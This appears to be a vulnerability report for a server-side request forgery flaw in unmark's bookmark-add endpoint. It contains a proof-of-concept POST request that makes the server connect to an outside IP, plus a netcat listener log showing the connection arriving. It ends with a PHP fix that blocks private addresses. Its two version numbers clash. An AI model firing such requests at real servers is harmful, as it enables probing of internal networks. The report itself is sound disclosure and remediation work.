### Key Information

#### Vulnerability Overview

- **Vulnerability Type**: SSRF (Server-Side Request Forgery)
- **Affected Software**: unmark v1.9.3
- **File**: application/controllers/Marks.php
- **Version**: 2.8.0

#### Analysis

- **Code Issue**:
  - Line 33: `$dom->loadHTMLFile($url, LIBXML_NOWARNING)` directly uses the user-provided `$url`.
  - Lines 25-28: Only checks if the URL starts with `http://` or `https://`, without filtering internal (private) addresses.
  - Lack of whitelist validation: No mechanism in the code to block or filter internal network addresses.

#### POC (Proof of Concept)

- **Request Example**:

```http
POST /marks/add HTTP/1.1
Host: www.unmark17.top
Referer: http://www.unmark17.top/marks
Cookie: PHPSESSID=64fjgqk9lirca0w5yvihoupg20;think_lang=zh-cn
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Origin: http://www.unmark17.top
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:14.0) Gecko/20100101 Firefox/14.0
Accept-Encoding: gzip, deflate
Upgrade-Insecure-Requests: 1
Priority: u=0,
Content-Length: 19

add_from_url=1&url=http://8.138.152.157:2333
```

- **Response Example**:

```bash
root@iZ23x40k8tI3z274a82dbzI:~# nc -lvp 2333
Listening on 0.0.0.0 2333
Connection received on 124.64.23.129 38457
GET / HTTP/1.1
Host: 8.138.152.157:2333
Connection: close
```

#### Summary

This vulnerability allows attackers to access internal network resources by crafting malicious URLs, potentially leading to further security risks.
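
The address filtering that the Analysis section finds missing could look like the following added example (not unmark's code; the function names are hypothetical). It resolves the host, refuses private, loopback and link-local targets, and fetches only from the vetted address with redirects disabled. It assumes the curl extension and IPv4 resolution through `gethostbynamel`, so hosts with only IPv6 records are refused.

```php
<?php
// Added example (not unmark's code); function names are hypothetical.

/** True only for addresses outside private and reserved ranges. */
function is_public_ip(string $ip): bool
{
    $flags = FILTER_FLAG_NO_PRIV_RANGE | FILTER_FLAG_NO_RES_RANGE;
    return filter_var($ip, FILTER_VALIDATE_IP, $flags) !== false;
}

/** Validate $url; return [host, port, ip] to connect to, or null to refuse. */
function resolve_public_target(string $url): ?array
{
    $p = parse_url($url);
    if (!is_array($p) || !isset($p['scheme'], $p['host'])) return null;
    $scheme = strtolower($p['scheme']);
    if ($scheme !== 'http' && $scheme !== 'https') return null;
    $host = trim($p['host'], '[]');               // parse_url keeps IPv6 brackets
    $port = $p['port'] ?? ($scheme === 'https' ? 443 : 80);
    // Check what the name resolves to, not how the host is spelled.
    $ips = filter_var($host, FILTER_VALIDATE_IP) ? [$host] : (gethostbynamel($host) ?: []);
    foreach ($ips as $ip) {
        if (!is_public_ip($ip)) return null;      // any internal record rejects
    }
    return $ips ? [$host, $port, $ips[0]] : null;
}

/** Fetch the page body from the validated address only; no redirects. */
function fetch_public_url(string $url): ?string
{
    if (($t = resolve_public_target($url)) === null) return null;
    [$host, $port, $ip] = $t;
    $ch = curl_init($url);
    curl_setopt_array($ch, [
        CURLOPT_RETURNTRANSFER => true,
        CURLOPT_FOLLOWLOCATION => false,          // a 30x could point inward
        CURLOPT_PROTOCOLS      => CURLPROTO_HTTP | CURLPROTO_HTTPS,
        CURLOPT_TIMEOUT        => 10,
    ]);
    // Pin DNS to the vetted IP so a second lookup cannot return a different one.
    if ($host !== $ip) curl_setopt($ch, CURLOPT_RESOLVE, ["$host:$port:$ip"]);
    $body = curl_exec($ch);
    return is_string($body) ? $body : null;
}

// Constructed sample inputs (IP literals, so this part runs offline).
foreach (['http://127.0.0.1:2333', 'http://169.254.169.254/', 'http://10.0.0.5/',
          'http://[::1]/', 'file:///etc/passwd', 'http://8.8.8.8/'] as $u) {
    printf("%-26s %s\n", $u, resolve_public_target($u) ? 'allowed' : 'refused');
}
```

The returned body can then be parsed with `$dom->loadHTML($body, LIBXML_NOWARNING)` in place of passing the URL to `loadHTMLFile`. The PHP filter flags do not cover every special-purpose range (for example 100.64.0.0/10), so extend `is_public_ip` to match the deployment's network.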